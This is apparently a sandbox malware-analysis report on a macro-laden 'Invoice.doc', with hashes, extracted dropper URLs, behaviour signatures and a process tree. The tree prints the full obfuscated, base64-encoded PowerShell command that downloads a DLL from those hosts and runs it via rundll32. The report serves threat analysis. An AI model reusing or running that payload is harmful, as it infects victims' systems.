Analysis

  • max time kernel
    70s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    12-01-2021 22:57

General

  • Target

    Invoice.doc

  • Size

    104KB

  • MD5

    30ba4d1ef25df11900d25555ed1afe92

  • SHA1

    47f747a0168edc7c1750cbdfebed933dd3800e40

  • SHA256

    6da352775ced73dd49b4344432f09042fdb661cb4fec4d6253702fb0ed72c8b1

  • SHA512

    bd6f61ed4f19cb977811768103b65716ad4bf8e8fc81cff62c1f4347ab1d66ef79d206f27b5e10a05986e3260f3f1ebeb62a1fefaa02d511353c395a15dc2894

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://angel2gether.de/BlutEngel/SpeechEngines/

exe.dropper

http://holonchile.cl/cgi-bin/System32/

exe.dropper

http://members.nlbformula.com/cgi-bin/Microsoft.NET/

exe.dropper

http://akybron.hu/wordpress/Triedit/

exe.dropper

https://norailya.com/drupal/4zKMm/

exe.dropper

http://giannaspsychicstudio.com/cgi-bin/Systems/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Invoice.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1744
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAbAB1AE4AOQBjAFgAPQBbAHQAWQBwAGUAXQAoACIAewAyAH0AewAwAH0AewAzAH0AewA0AH0AewAxAH0AIgAgAC0ARgAnAEUATQAuAEkATwAnACwAJwB5ACcALAAnAFMAWQBzAFQAJwAsACcALgBEAEkAcgBFAEMAVAAnACwAJwBPAHIAJwApACAAOwAgACAAUwBlAHQAIAAgACgAJwBMADQAYQAnACsAJwBIACcAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsANgB9AHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsANwB9AHsANQB9AHsAMwB9ACIAIAAtAGYAJwBFACcALAAnAEUAdAAuAFMARQByAFYAaQBjAGUAcAAnACwAJwBUACcALAAnAGUAUgAnACwAJwBtAC4AbgAnACwAJwBBAE4AYQBnACcALAAnAFMAeQBTACcALAAnAG8AaQBuAHQAbQAnACkAIAAgACkAIAA7ACAAJABEAHAAXwBqAG0AYgB0AD0AJABFADcAOABMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABJADAANQBRADsAJABYADUANQBOAD0AKAAnAFEANAAnACsAJwA4AEsAJwApADsAIAAgACQATAB1AE4AOQBDAFgAOgA6ACIAYwBSAGAAZQBhAFQAYABFAGQASQBSAGAARQBgAGMAdABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAAnACsAJwB9ACcAKwAnAEwAJwArACcAbQBsADMAeABiAG4AewAwACcAKwAnAH0AVQA2AGgAdwAnACsAKAAnAGcAbAAnACsAJwBuACcAKQArACcAewAwAH0AJwApAC0AZgBbAEMAaABhAHIAXQA5ADIAKQApADsAJABDADUANQBXAD0AKAAoACcATAA4ACcAKwAnADUAJwApACsAJwBXACcAKQA7ACAAKABnAEUAVAAtAFYAYQByAEkAYQBiAEwARQAgACAAKAAnAGwANABhACcAKwAnAEgAJwApACAAIAAtAFYAYQBMAFUARQBvAG4AKQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAWQBgAHAAcgBvAHQAYABPAGMAbwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABKADAAMQBNAD0AKAAnAFMANAAnACsAJwAxAEYAJwApADsAJABYADYAbABzAGkAYgBiACAAPQAgACgAJwBMAF8AJwArACcAMgBGACcAKQA7ACQAWAA1ADQAUAA9ACgAJwBHADYAJwArACcAXwBZACcAKQA7ACQAUgA3ADIANQAzAG8AZQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAJwArACgAJwBtACcAKwAnAGwAMwB4AGIAJwArACcAbgAnACkAKwAnAHsAMAAnACsAJwB9AFUANgBoAHcAZwBsACcAKwAnAG4AJwArACcAewAnACsAJwAwACcAKwAnAH0AJwApACAAIAAtAEYAIAAgAFsAQwBoAEEAcgBdADkAMgApACsAJABYADYAbABzAGkAYgBiACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABWADMAOQBZAD0AKAAnAFEANgAnACsAJwA2AEUAJwApADsAJABYAGwAdwB2AGwAaAA2AD0AKAAnAHcAJwArACcAXQAnACsAKAAnAHgAbQBbACcAKwAnAHYAOgAnACkAKwAoACcALwAvACcAKwAnAGEAJwApACsAKAAnAG4AZwAnACsAJwBlAGwAMgBnACcAKQArACgAJwBlAHQAJwArACcAaAAnACkAKwAnAGUAcgAnACsAKAAnAC4AZAAnACsAJwBlAC8AQgBsACcAKQArACcAdQB0ACcAKwAnAEUAJwArACgAJwBuAGcAZQAnACsAJwBsACcAKQArACgAJwAvAFMAcABlAGUAJwArACcAYwBoAEUAJwArACcAbgAnACkAKwAoACcAZwBpAG4AZQBzACcAKwAnAC8AQAAnACsAJwB3AF0AeABtAFsAdgA6ACcAKQArACcALwAnACsAKAAnAC8AaABvAGwAJwArACcAbwBuACcAKQArACcAYwAnACsAKAAnAGgAJwArACcAaQAnACsAJwBsAGUALgAnACsAJwBjAGwALwBjAGcAJwArACcAaQAtAGIAJwArACcAaQBuAC8AUwB5ACcAKQArACgAJwBzAHQAJwArACcAZQBtACcAKQArACgAJwAzADIAJwArACcALwBAAHcAJwApACsAKAAnAF0AJwArACcAeABtACcAKQArACgAJwBbACcAKwAnAHYAOgAnACkAKwAnAC8AJwArACcALwAnACsAKAAnAG0AZQBtAGIAZQAnACsAJwByACcAKQArACgAJwBzAC4AJwArACcAbgAnACkAKwAoACcAbABiAGYAbwAnACsAJwByAG0AdQBsACcAKwAnAGEALgBjAG8AbQAvAGMAJwArACcAZwAnACkAKwAoACcAaQAnACsAJwAtAGIAJwApACsAKAAnAGkAbgAvACcAKwAnAE0AJwApACsAKAAnAGkAYwByAG8AcwAnACsAJwBvACcAKQArACcAZgB0ACcAKwAnAC4AJwArACgAJwBOAEUAVAAnACsAJwAvACcAKwAnAEAAdwAnACkAKwAnAF0AJwArACcAeAAnACsAKAAnAG0AJwArACcAWwB2ACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAYQBrACcAKwAnAHkAJwApACsAKAAnAGIAcgAnACsAJwBvAG4AJwApACsAJwAuACcAKwAnAGgAdQAnACsAKAAnAC8AdwAnACsAJwBvACcAKQArACgAJwByACcAKwAnAGQAcAByACcAKwAnAGUAcwBzACcAKwAnAC8AVAByAGkAZQBkAGkAJwApACsAKAAnAHQALwAnACsAJwBAACcAKQArACcAdwAnACsAKAAnAF0AJwArACcAeABtAFsAdgAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwBuAG8AcgAnACsAJwBhAGkAbAAnACkAKwAoACcAeQAnACsAJwBhAC4AYwAnACkAKwAnAG8AJwArACgAJwBtACcAKwAnAC8AZAAnACsAJwByACcAKwAnAHUAcAAnACsAJwBhAGwAJwArACcALwA0AHoASwBNAG0ALwBAAHcAXQAnACsAJwB4AG0AJwApACsAKAAnAFsAJwArACcAdgAnACsAJwA6AC8ALwBnAGkAYQAnACsAJwBuAG4AYQBzACcAKQArACcAcABzACcAKwAnAHkAYwAnACsAKAAnAGgAaQAnACsAJwBjACcAKQArACgAJwBzAHQAJwArACcAdQAnACkAKwAoACcAZAAnACsAJwBpAG8AJwApACsAJwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwArACgAJwBjACcAKwAnAGcAaQAtAGIAaQAnACkAKwAoACcAbgAvACcAKwAnAFMAeQAnACkAKwAnAHMAdAAnACsAJwBlAG0AJwArACcAcwAnACsAJwAvACcAKQAuACIAUgBFAGAAcABMAGEAYABDAGUAIgAoACgAJwB3ACcAKwAoACcAXQAnACsAJwB4AG0AWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAJwArACgAJwBzAGUAJwArACcAdwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBQAEwAYABJAHQAIgAoACQAQwA1AF8ATAAgACsAIAAkAEQAcABfAGoAbQBiAHQAIAArACAAJABIADQANQBJACkAOwAkAEUAMwAyAFQAPQAoACcAQQA1ACcAKwAnADkASAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAegBfAGMANgBwADIAIABpAG4AIAAkAFgAbAB3AHYAbABoADYAKQB7AHQAcgB5AHsAKAAmACgAJwBOACcAKwAnAGUAdwAnACsAJwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAWQBTAFQARQBtAC4AbgBFAFQALgBXAEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAGAATwB3AGAATgBsAG8AQQBkAGAARgBpAGwAZQAiACgAJABMAHoAXwBjADYAcAAyACwAIAAkAFIANwAyADUAMwBvAGUAKQA7ACQAVwAwADIAQgA9ACgAKAAnAE0ANgAnACsAJwAyACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAUgA3ADIANQAzAG8AZQApAC4AIgBMAGAAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA5ADAANwAyACkAIAB7ACYAKAAnAHIAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFIANwAyADUAMwBvAGUALAAoACcAUwAnACsAKAAnAGgAJwArACcAbwB3ACcAKQArACcARABpACcAKwAoACcAYQAnACsAJwBsAG8AZwBBACcAKQApAC4AIgBUAG8AcwB0AFIAYABJAGAATgBHACIAKAApADsAJABLAF8AMgBBAD0AKAAnAEwAMAAnACsAJwAxAEgAJwApADsAYgByAGUAYQBrADsAJABDADcAXwBHAD0AKAAoACcAQgAnACsAJwAxADQAJwApACsAJwBMACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwAzADEARgA9ACgAJwBJAF8AJwArACcAMgBDACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:344
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1096
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IAAgACQAbAB1AE4AOQBjAFgAPQBbAHQAWQBwAGUAXQAoACIAewAyAH0AewAwAH0AewAzAH0AewA0AH0AewAxAH0AIgAgAC0ARgAnAEUATQAuAEkATwAnACwAJwB5ACcALAAnAFMAWQBzAFQAJwAsACcALgBEAEkAcgBFAEMAVAAnACwAJwBPAHIAJwApACAAOwAgACAAUwBlAHQAIAAgACgAJwBMADQAYQAnACsAJwBIACcAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsANgB9AHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsANwB9AHsANQB9AHsAMwB9ACIAIAAtAGYAJwBFACcALAAnAEUAdAAuAFMARQByAFYAaQBjAGUAcAAnACwAJwBUACcALAAnAGUAUgAnACwAJwBtAC4AbgAnACwAJwBBAE4AYQBnACcALAAnAFMAeQBTACcALAAnAG8AaQBuAHQAbQAnACkAIAAgACkAIAA7ACAAJABEAHAAXwBqAG0AYgB0AD0AJABFADcAOABMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABJADAANQBRADsAJABYADUANQBOAD0AKAAnAFEANAAnACsAJwA4AEsAJwApADsAIAAgACQATAB1AE4AOQBDAFgAOgA6ACIAYwBSAGAAZQBhAFQAYABFAGQASQBSAGAARQBgAGMAdABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAAnACsAJwB9ACcAKwAnAEwAJwArACcAbQBsADMAeABiAG4AewAwACcAKwAnAH0AVQA2AGgAdwAnACsAKAAnAGcAbAAnACsAJwBuACcAKQArACcAewAwAH0AJwApAC0AZgBbAEMAaABhAHIAXQA5ADIAKQApADsAJABDADUANQBXAD0AKAAoACcATAA4ACcAKwAnADUAJwApACsAJwBXACcAKQA7ACAAKABnAEUAVAAtAFYAYQByAEkAYQBiAEwARQAgACAAKAAnAGwANABhACcAKwAnAEgAJwApACAAIAAtAFYAYQBMAFUARQBvAG4AKQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAWQBgAHAAcgBvAHQAYABPAGMAbwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABKADAAMQBNAD0AKAAnAFMANAAnACsAJwAxAEYAJwApADsAJABYADYAbABzAGkAYgBiACAAPQAgACgAJwBMAF8AJwArACcAMgBGACcAKQA7ACQAWAA1ADQAUAA9ACgAJwBHADYAJwArACcAXwBZACcAKQA7ACQAUgA3ADIANQAzAG8AZQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAJwArACgAJwBtACcAKwAnAGwAMwB4AGIAJwArACcAbgAnACkAKwAnAHsAMAAnACsAJwB9AFUANgBoAHcAZwBsACcAKwAnAG4AJwArACcAewAnACsAJwAwACcAKwAnAH0AJwApACAAIAAtAEYAIAAgAFsAQwBoAEEAcgBdADkAMgApACsAJABYADYAbABzAGkAYgBiACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABWADMAOQBZAD0AKAAnAFEANgAnACsAJwA2AEUAJwApADsAJABYAGwAdwB2AGwAaAA2AD0AKAAnAHcAJwArACcAXQAnACsAKAAnAHgAbQBbACcAKwAnAHYAOgAnACkAKwAoACcALwAvACcAKwAnAGEAJwApACsAKAAnAG4AZwAnACsAJwBlAGwAMgBnACcAKQArACgAJwBlAHQAJwArACcAaAAnACkAKwAnAGUAcgAnACsAKAAnAC4AZAAnACsAJwBlAC8AQgBsACcAKQArACcAdQB0ACcAKwAnAEUAJwArACgAJwBuAGcAZQAnACsAJwBsACcAKQArACgAJwAvAFMAcABlAGUAJwArACcAYwBoAEUAJwArACcAbgAnACkAKwAoACcAZwBpAG4AZQBzACcAKwAnAC8AQAAnACsAJwB3AF0AeABtAFsAdgA6ACcAKQArACcALwAnACsAKAAnAC8AaABvAGwAJwArACcAbwBuACcAKQArACcAYwAnACsAKAAnAGgAJwArACcAaQAnACsAJwBsAGUALgAnACsAJwBjAGwALwBjAGcAJwArACcAaQAtAGIAJwArACcAaQBuAC8AUwB5ACcAKQArACgAJwBzAHQAJwArACcAZQBtACcAKQArACgAJwAzADIAJwArACcALwBAAHcAJwApACsAKAAnAF0AJwArACcAeABtACcAKQArACgAJwBbACcAKwAnAHYAOgAnACkAKwAnAC8AJwArACcALwAnACsAKAAnAG0AZQBtAGIAZQAnACsAJwByACcAKQArACgAJwBzAC4AJwArACcAbgAnACkAKwAoACcAbABiAGYAbwAnACsAJwByAG0AdQBsACcAKwAnAGEALgBjAG8AbQAvAGMAJwArACcAZwAnACkAKwAoACcAaQAnACsAJwAtAGIAJwApACsAKAAnAGkAbgAvACcAKwAnAE0AJwApACsAKAAnAGkAYwByAG8AcwAnACsAJwBvACcAKQArACcAZgB0ACcAKwAnAC4AJwArACgAJwBOAEUAVAAnACsAJwAvACcAKwAnAEAAdwAnACkAKwAnAF0AJwArACcAeAAnACsAKAAnAG0AJwArACcAWwB2ACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAYQBrACcAKwAnAHkAJwApACsAKAAnAGIAcgAnACsAJwBvAG4AJwApACsAJwAuACcAKwAnAGgAdQAnACsAKAAnAC8AdwAnACsAJwBvACcAKQArACgAJwByACcAKwAnAGQAcAByACcAKwAnAGUAcwBzACcAKwAnAC8AVAByAGkAZQBkAGkAJwApACsAKAAnAHQALwAnACsAJwBAACcAKQArACcAdwAnACsAKAAnAF0AJwArACcAeABtAFsAdgAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwBuAG8AcgAnACsAJwBhAGkAbAAnACkAKwAoACcAeQAnACsAJwBhAC4AYwAnACkAKwAnAG8AJwArACgAJwBtACcAKwAnAC8AZAAnACsAJwByACcAKwAnAHUAcAAnACsAJwBhAGwAJwArACcALwA0AHoASwBNAG0ALwBAAHcAXQAnACsAJwB4AG0AJwApACsAKAAnAFsAJwArACcAdgAnACsAJwA6AC8ALwBnAGkAYQAnACsAJwBuAG4AYQBzACcAKQArACcAcABzACcAKwAnAHkAYwAnACsAKAAnAGgAaQAnACsAJwBjACcAKQArACgAJwBzAHQAJwArACcAdQAnACkAKwAoACcAZAAnACsAJwBpAG8AJwApACsAJwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwArACgAJwBjACcAKwAnAGcAaQAtAGIAaQAnACkAKwAoACcAbgAvACcAKwAnAFMAeQAnACkAKwAnAHMAdAAnACsAJwBlAG0AJwArACcAcwAnACsAJwAvACcAKQAuACIAUgBFAGAAcABMAGEAYABDAGUAIgAoACgAJwB3ACcAKwAoACcAXQAnACsAJwB4AG0AWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAJwArACgAJwBzAGUAJwArACcAdwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBQAEwAYABJAHQAIgAoACQAQwA1AF8ATAAgACsAIAAkAEQAcABfAGoAbQBiAHQAIAArACAAJABIADQANQBJACkAOwAkAEUAMwAyAFQAPQAoACcAQQA1ACcAKwAnADkASAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAegBfAGMANgBwADIAIABpAG4AIAAkAFgAbAB3AHYAbABoADYAKQB7AHQAcgB5AHsAKAAmACgAJwBOACcAKwAnAGUAdwAnACsAJwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAWQBTAFQARQBtAC4AbgBFAFQALgBXAEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAGAATwB3AGAATgBsAG8AQQBkAGAARgBpAGwAZQAiACgAJABMAHoAXwBjADYAcAAyACwAIAAkAFIANwAyADUAMwBvAGUAKQA7ACQAVwAwADIAQgA9ACgAKAAnAE0ANgAnACsAJwAyACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAUgA3ADIANQAzAG8AZQApAC4AIgBMAGAAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA5ADAANwAyACkAIAB7ACYAKAAnAHIAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFIANwAyADUAMwBvAGUALAAoACcAUwAnACsAKAAnAGgAJwArACcAbwB3ACcAKQArACcARABpACcAKwAoACcAYQAnACsAJwBsAG8AZwBBACcAKQApAC4AIgBUAG8AcwB0AFIAYABJAGAATgBHACIAKAApADsAJABLAF8AMgBBAD0AKAAnAEwAMAAnACsAJwAxAEgAJwApADsAYgByAGUAYQBrADsAJABDADcAXwBHAD0AKAAoACcAQgAnACsAJwAxADQAJwApACsAJwBMACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwAzADEARgA9ACgAJwBJAF8AJwArACcAMgBDACcAKQA=
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:576
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:968
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:1548
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eqrkfmlqcxcuiv\zampxihoguhgi.dhq",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:1104

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll
      MD5

      238a0e860a00ea4cc8ee2af05f2fbddf

      SHA1

      9df6ff60eab437a31d0a2117d25663ca6a2f7b73

      SHA256

      8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

      SHA512

      c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

    • \Users\Admin\Lml3xbn\U6hwgln\L_2F.dll
      MD5

      238a0e860a00ea4cc8ee2af05f2fbddf

      SHA1

      9df6ff60eab437a31d0a2117d25663ca6a2f7b73

      SHA256

      8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

      SHA512

      c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

    • \Users\Admin\Lml3xbn\U6hwgln\L_2F.dll
      MD5

      238a0e860a00ea4cc8ee2af05f2fbddf

      SHA1

      9df6ff60eab437a31d0a2117d25663ca6a2f7b73

      SHA256

      8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

      SHA512

      c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

    • \Users\Admin\Lml3xbn\U6hwgln\L_2F.dll
      MD5

      238a0e860a00ea4cc8ee2af05f2fbddf

      SHA1

      9df6ff60eab437a31d0a2117d25663ca6a2f7b73

      SHA256

      8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

      SHA512

      c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

    • \Users\Admin\Lml3xbn\U6hwgln\L_2F.dll
      MD5

      238a0e860a00ea4cc8ee2af05f2fbddf

      SHA1

      9df6ff60eab437a31d0a2117d25663ca6a2f7b73

      SHA256

      8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

      SHA512

      c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

    • memory/308-19-0x000007FEF7730000-0x000007FEF79AA000-memory.dmp
      Filesize

      2.5MB

    • memory/576-6-0x000000001AC20000-0x000000001AC21000-memory.dmp
      Filesize

      4KB

    • memory/576-9-0x000000001B910000-0x000000001B911000-memory.dmp
      Filesize

      4KB

    • memory/576-10-0x000000001C460000-0x000000001C461000-memory.dmp
      Filesize

      4KB

    • memory/576-8-0x0000000002560000-0x0000000002561000-memory.dmp
      Filesize

      4KB

    • memory/576-7-0x0000000002400000-0x0000000002401000-memory.dmp
      Filesize

      4KB

    • memory/576-5-0x0000000002520000-0x0000000002521000-memory.dmp
      Filesize

      4KB

    • memory/576-4-0x000007FEF55C0000-0x000007FEF5FAC000-memory.dmp
      Filesize

      9.9MB

    • memory/576-3-0x0000000000000000-mapping.dmp
    • memory/968-11-0x0000000000000000-mapping.dmp
    • memory/1096-2-0x0000000000000000-mapping.dmp
    • memory/1104-18-0x0000000000000000-mapping.dmp
    • memory/1548-13-0x0000000000000000-mapping.dmp